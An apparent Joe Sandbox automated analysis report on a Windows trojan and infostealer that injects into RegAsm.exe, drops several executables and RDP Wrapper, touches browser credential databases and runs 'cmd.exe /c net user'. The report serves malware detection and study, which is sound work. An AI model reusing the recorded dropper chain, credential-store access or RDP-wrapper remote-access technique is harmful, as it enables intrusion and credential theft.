Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2220DB30	15_2_2220DB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221FF8D0	15_2_221FF8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22223920	15_2_22223920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221F9CC0	15_2_221F9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2221FD50	15_2_2221FD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22225F40	15_2_22225F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22244FB2	15_2_22244FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220A4CF0	15_2_220A4CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2209EA80	15_2_2209EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220BBAB0	15_2_220BBAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220A9000	15_2_220A9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220C7810	15_2_220C7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2209F160	15_2_2209F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220CCE10	15_2_220CCE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220D6E80	15_2_220D6E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220A66C0	15_2_220A66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220C1C50	15_2_220C1C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_220BA560	15_2_220BA560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2209D57C	15_2_2209D57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2218E2E0	15_2_2218E2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2215A330	15_2_2215A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22120350	15_2_22120350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22132390	15_2_22132390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221253B0	15_2_221253B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2213B3A0	15_2_2213B3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22147010	15_2_22147010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22103000	15_2_22103000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22165030	15_2_22165030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221B8030	15_2_221B8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2215B020	15_2_2215B020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2217D020	15_2_2217D020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22194020	15_2_22194020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2216B040	15_2_2216B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221B5040	15_2_221B5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22162090	15_2_22162090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2214E0D0	15_2_2214E0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22160110	15_2_22160110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22118120	15_2_22118120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22171129	15_2_22171129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22189190	15_2_22189190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2212E630	15_2_2212E630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22139690	15_2_22139690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2214D6D0	15_2_2214D6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22159770	15_2_22159770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22128760	15_2_22128760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221BF790	15_2_221BF790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22112450	15_2_22112450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22184440	15_2_22184440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2216A470	15_2_2216A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22169490	15_2_22169490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221B24C0	15_2_221B24C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221A7510	15_2_221A7510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22188520	15_2_22188520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2218A590	15_2_2218A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221D85A0	15_2_221D85A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2215E5C0	15_2_2215E5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22109A10	15_2_22109A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221B9A20	15_2_221B9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22194A60	15_2_22194A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2215DB40	15_2_2215DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221CE800	15_2_221CE800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22172870	15_2_22172870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22149860	15_2_22149860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22189950	15_2_22189950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22145940	15_2_22145940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2218A940	15_2_2218A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22104970	15_2_22104970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221769C0	15_2_221769C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2216EE20	15_2_2216EE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2217EE90	15_2_2217EE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22109C20	15_2_22109C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22120C70	15_2_22120C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22162CF0	15_2_22162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22160D10	15_2_22160D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2211D030	15_2_2211D030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221785C0	15_2_221785C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221139A0	15_2_221139A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2210BE60	15_2_2210BE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_22167E90	15_2_22167E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_221DCC30	15_2_221DCC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_2222D7C0	15_2_2222D7C0

Source: Joe Sandbox View	Dropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
Source: Joe Sandbox View	Dropped File: C:\ProgramData\EBAAFCAFCB.exe 63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C7894D0 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC80 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041D1E0 appears 164 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C77CBE8 appears 134 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.1435170667.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EBAAFCAFCB.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KECGDBFCBK.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5db9e54794_vfkagks[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5de72d9ebd_rdp[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: JKEHIIJJEC.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 66f5de72d9ebd_rdp[1].exe.3.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: JKEHIIJJEC.exe.3.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 66f5de72d9ebd_rdp[1].exe.3.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'LROw/ocyJreQVkBTZvl7OBssok9gw2ju6Qfe7b+JT01lW9MUPsj68DhkAI4ibyqjKCtcLKeJNYA='
Source: 66f5de72d9ebd_rdp[1].exe.3.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'YWrJ2+g0t2313nx3LyyJJhh5Cws2Jt788zD4XGLCyNPviMBR5z8ILg=='
Source: 66f5de72d9ebd_rdp[1].exe.3.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'Rm4MG6rd1SN7Wo9CLx5vPeaVwDC2pcgwGCnVCzwmFmZmhwbmfiEWuK8DPjVl7ZpCziLS4+w5F1rWwxW5IjCcNw==', 'Rm4MG6rd1SN7Wo9CLx5vPeaVwDC2pcgwGCnVCzwmFmZmhwbmfiEWuK8DPjVl7ZpCziLS4+w5F1rWwxW5IjCcNw==', 'XohKHRUP1q1zoi1cdFzmb+hRBrfJyjigj0IG17FL08xCHjZIOqV1TYciZPU9zM9I9LjqmdLTRjMJ3OFW3e6AgQ8EyJ8xLS7gB1qXVddjvvE3+ZyaEyZJyOhL+IVKwejhsbpKHLn+/aM='
Source: JKEHIIJJEC.exe.3.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'LROw/ocyJreQVkBTZvl7OBssok9gw2ju6Qfe7b+JT01lW9MUPsj68DhkAI4ibyqjKCtcLKeJNYA='
Source: JKEHIIJJEC.exe.3.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'YWrJ2+g0t2313nx3LyyJJhh5Cws2Jt788zD4XGLCyNPviMBR5z8ILg=='
Source: JKEHIIJJEC.exe.3.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'Rm4MG6rd1SN7Wo9CLx5vPeaVwDC2pcgwGCnVCzwmFmZmhwbmfiEWuK8DPjVl7ZpCziLS4+w5F1rWwxW5IjCcNw==', 'Rm4MG6rd1SN7Wo9CLx5vPeaVwDC2pcgwGCnVCzwmFmZmhwbmfiEWuK8DPjVl7ZpCziLS4+w5F1rWwxW5IjCcNw==', 'XohKHRUP1q1zoi1cdFzmb+hRBrfJyjigj0IG17FL08xCHjZIOqV1TYciZPU9zM9I9LjqmdLTRjMJ3OFW3e6AgQ8EyJ8xLS7gB1qXVddjvvE3+ZyaEyZJyOhL+IVKwejhsbpKHLn+/aM='

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@59/44@16/14

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C7A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C7A7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411807

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Program Files\RDP Wrapper

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2832:120:WilError_03
Source: C:\ProgramData\JKEHIIJJEC.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: Yara match	File source: 23.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000000.2112865515.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2150209183.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000F0B000.00000004.00000020.00020000.00000000.sdmp, GCGHII.15.dr, DBGHDG.3.dr, IEBFIE.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2162837314.0000000020168000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EBAAFCAFCB.exe "C:\ProgramData\EBAAFCAFCB.exe"
Source: C:\ProgramData\EBAAFCAFCB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\EBAAFCAFCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\EBAAFCAFCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECGDBFCBK.exe "C:\ProgramData\KECGDBFCBK.exe"
Source: C:\ProgramData\KECGDBFCBK.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KECGDBFCBK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\JKEHIIJJEC.exe "C:\ProgramData\JKEHIIJJEC.exe"
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
